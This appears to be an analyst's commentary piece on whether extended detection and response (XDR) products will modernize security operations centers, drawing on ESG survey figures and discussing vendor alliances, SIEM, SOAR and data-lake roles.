Will XDR modernize the SOC?

Things have certainly progressed since I started writing about XDR (extended detection and response).

There are more vendors claiming to offer XDR—far beyond just the endpoint detection and response (EDR) vendors. XDR now collects, processes, and analyzes telemetry from more data sources, like cloud access security brokers (CASB), SaaS applications, and IAM systems. There are also at least 3 XDR ‘alliances,’ one led by CrowdStrike, another includes vendors like Exabeam, Extrahop, Mimecast, Netskope, and SentinelOne, while a third is based on standards from the Open Cybersecurity Alliance with participants like IBM and McAfee. 

Yup, XDR is making progress by expanding its features and functionality. That’s a great start, but some vendors believe that XDR can cover the whole security operations center technology enchilada, usurping the role of foundational technologies like security information and event management (SIEM), security orchestration, automation, and response (SOAR), and threat intelligence platforms (TIP) as organizations modernize their SOCs with more intelligence, automated workflows, and decision support for analyst processes.

So, while everyone is talking XDR, no one is telling quite the same story. ESG offers this definition:

XDR as an integrated suite of security products spanning hybrid IT architectures, designed to interoperate and coordinate on threat prevention, detection, and response. XDR unifies control points, security telemetry, analytics, and operations into one enterprise system.

XDR and SOC modernization

In a recent research project, ESG asked 339 enterprise security professionals what role could XDR play in SOC modernization. Here are their responses and my commentary:

• 58% of security professionals say XDR could modernize the SOC by enhancing/improving/aggregating current security analytics capabilities. That’s certainly the primary mission for XDR, providing high-fidelity alerts from data analysis across a cyber kill chain. This could modernize the SOC by automating Tier-1 analyst tasks like alert triage, leading to massive improvements in SOC efficiency and analyst productivity.
• 55% of security professionals say XDR could modernize the SOC by integrating with SOAR for security process automation. This objective isn’t nearly as clear. XDR systems codify simple task automation—like matching a file hash with VirusTotal—while SOAR is really built to automate processes end-to-end and even integrate into ITSM systems (i.e., think ServiceNow for both SOAR and ITSM). In other words, XDR and SOAR are loosely coupled at best today, and I don’t see this changing. The best XDR systems will continue to take on basic task automation without the need for SOAR.
• 37% of security professionals say XDR could modernize the SOC by acting as a data lake for queries and investigations. This one is possible and clearly why CrowdStrike acquired Humio and SentinelOne purchased Scalyr—both cloud-based big data analytics engines. Still, many organizations are already using SIEMs as data lakes and most SIEM vendors (i.e., Elastic, Exabeam, IBM, Splunk, SumoLogic, etc.) are already cloud based. There are also big, scalable, cloud-based platforms in this space like Chronicle and Devo that can ingest other data for investigations and threat hunting. Given this, XDR may end up being more of a data stream than data lake.

In my humble opinion, large organizations are doing two things simultaneously: adopting XDR technology and modernizing the SOC. XDR is used to improve threat detection efficacy while consolidating point tools, while SOC modernization is about detections as code, aligning with MITRE ATT&CK, canning analyst workflows, and end-to-end process automation. No doubt that XDR will contribute to SOC modernization, but XDR vendors already have their hands full developing advanced analytics, accommodating new data sources, automating tasks, and presenting everything to analysts in an intuitive way. Successful XDR vendors will remain heads down on these developments—at least over the next few years.